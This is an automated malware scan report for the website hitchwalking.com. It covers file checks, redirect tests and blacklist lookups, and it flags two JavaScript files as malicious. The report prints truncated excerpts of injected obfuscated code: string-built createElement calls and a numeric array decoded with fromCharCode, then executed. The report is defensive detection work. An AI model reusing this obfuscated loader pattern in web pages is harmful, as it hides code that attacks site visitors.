Scanned pages/files
Request | Server response | Status |
http://hitchwalking.com/ | 200 OK Content-Length: 844 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: text/javascript | clean |
http://hitchwalking.com/jquery.tzineClock/jquery.tzineClock.js | 200 OK Content-Length: 11773 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function($){ var gVars = {}; $.fn.tzineClock = function(opts){ var container = this.eq(0); if(!container) { try{ console.log("Invalid selector!"); } catch(e){} return false; } if(!opts) opts = {}; var defaults = { }; $.each(defaults,function(k,v){ opts[k] = opts[k] || defaults[k]; }) setUp.call(container); if(f)e(s);} Antivirus reports:
| ||
http://hitchwalking.com/script.js | 200 OK Content-Length: 7578 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) $(document).ready(function(){ $('#fancyClock').tzineClock(); });try{prototype%2;}catch(asd){x=2;}try{q=document[(x)?"c"+"r":2+"e"+"a"+"t"+"e"+"E"+"l"+"e"+"m"+((f)?"e"+"n"+"t":"")]("p");q.appendChild(q+"");}catch(fwbewe){i=0;try{prototype*5;}catch(z){fr="fromChar";f=[510,702,550,594,580,630,555,660,160,660,505,720,580,492,485,660,500,666,545,468,585,654,490,606,570,240,205,738,50,192,160,192,160,708,485,684,160,624,525,192,305,192,580,624,525,690,230,690,505,606,500,192,235,192,580 if(f)e(s);} Antivirus reports:
| ||
http://hitchwalking.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hitchwalking.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 21 Jan 2015 15:19:25 GMT
Accept-Ranges: bytes
ETag: "1f20acd-34c-4b8ed96b44880"
Server: nginx
Vary: Accept-Encoding,User-Agent
Content-Length: 844
Content-Type: text/html
Last-Modified: Tue, 14 Feb 2012 14:41:22 GMT
X-Accel-Version: 0.01
X-Powered-By: PleskLin
...844 bytes of data.
GET / HTTP/1.1
Host: hitchwalking.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Wed, 21 Jan 2015 15:19:25 GMT
Accept-Ranges: bytes
ETag: "1f20acd-34c-4b8ed96b44880"
Server: nginx
Vary: Accept-Encoding,User-Agent
Content-Length: 844
Content-Type: text/html
Last-Modified: Tue, 14 Feb 2012 14:41:22 GMT
X-Accel-Version: 0.01
X-Powered-By: PleskLin
...844 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hitchwalking.com
Referer: http://www.google.com/search?q=hitchwalking.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hitchwalking.com
Referer: http://www.google.com/search?q=hitchwalking.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hitchwalking.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://hitchwalking.com/
Result: hitchwalking.com is not infected or malware details are not published yet.
Result: hitchwalking.com is not infected or malware details are not published yet.